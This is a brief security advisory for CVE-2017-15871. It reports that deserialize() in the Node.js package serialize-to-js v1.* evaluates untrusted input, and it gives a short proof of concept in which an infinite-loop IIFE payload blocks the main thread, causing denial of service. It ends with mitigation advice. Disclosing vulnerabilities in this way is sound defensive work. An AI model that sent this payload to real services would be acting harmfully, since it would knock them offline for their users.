Kay

security researcher @MalwareBenchmark.

CVE-2017-15871: DoS Through IIFE

Module: serialize-to-js, v1.*

Published: October 27th, 2017

Reported by: Kay

CVE-2017-15871

Overview

An issue was discovered in the serialize-to-js package v1.* for Node.js. serialize-to-js is a module for serializing an object or function into JSON. Untrusted data passed into the deserialize() function can be exploited to achieve Denial of Service by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).

PoC

var deserialize = require('serialize-to-js').deserialize;
// The payload is an IIFE, so its body runs as soon as the string is evaluated.
var payload = " (function(){ while(1){console.log('exploit')}}())";
deserialize(payload);

When deserialize(payload) is executed, the IIFE runs and console.log('exploit') is executed in an endless loop. The main thread is therefore blocked, which results in a Denial of Service.


Remediation

There is no patch available yet for this vulnerability, so we recommend not using serialize-to-js in network applications in combination with untrusted user input until a patch is available.
